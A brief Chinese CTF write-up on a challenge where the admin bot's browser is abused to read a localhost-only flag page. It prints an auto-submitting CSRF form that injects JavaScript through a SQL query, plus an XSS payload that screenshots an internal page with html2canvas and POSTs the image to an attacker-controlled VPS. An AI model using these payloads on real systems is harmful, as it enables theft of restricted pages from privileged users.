MySQL_Online(xss读取目标同源网页)

写在前面

巅峰极客挑战赛中，做到柠檬师傅出的题，由于自己的js水平太渣渣，这个题做了很久，于是赶快写文记录自己的解题过程。

描述

主要是XSS，网站中允许输入一个地址，管理员会使用chrome浏览器打开该网页。并且该网站存在一个能写入js代码的页面，最后flag藏在一个页面中，该页面在服务器配置时设置只允许127.0.0.1访问，其余为403错误。

思路

通过对该网站写入js代码，让127.0.0.1访问我们写好js代码的页面，最后得到flag页面。

过程

首先，先写一个自动提交form表单的页面

<script type="text/javascript">function autoSubmit(){ document.getElementById("myForm").submit();}</script><body onload="autoSubmit();" ><form id="myForm" action="http://127.0.0.1/runsql.php" method="post"><input name="sql" value = "select unhex('hexjs')" onChange="if (this.selectedIndex != 0) autoSubmit();">
</form>

当我们让管理员访问这个页面的时候，管理员就会post数据到本地的runsql.php页面，这时runsql.php页面上就会有我们的js数据

接下来构造js：

<html>
  <body>
<iframe id="mysql" width="778" align="center" height="200" id="win" name="win" onload="Javascript:SetWinHeight(this)" frameborder="0" scrolling="no" src="admin_zzzz666.php"></iframe>
    <script type="text/javascript" src="https://html2canvas.hertzen.com/dist/html2canvas.js"></script>
    <script type="text/javascript">
var mysql = document.getElementById("mysql").contentWindow.document;
        html2canvas(mysql.body).then(function(canvas) {
var xmlhttp;

  xmlhttp=new XMLHttpRequest();

xmlhttp.open("POST","your vsp",true);

xmlhttp.send(canvas.toDataURL());
});
    </script>
  </body>
</html>

这个页面会自动获取同源网页的页面，然后发送到vps上。最后就能得到flag了。

admin_zzzz666.php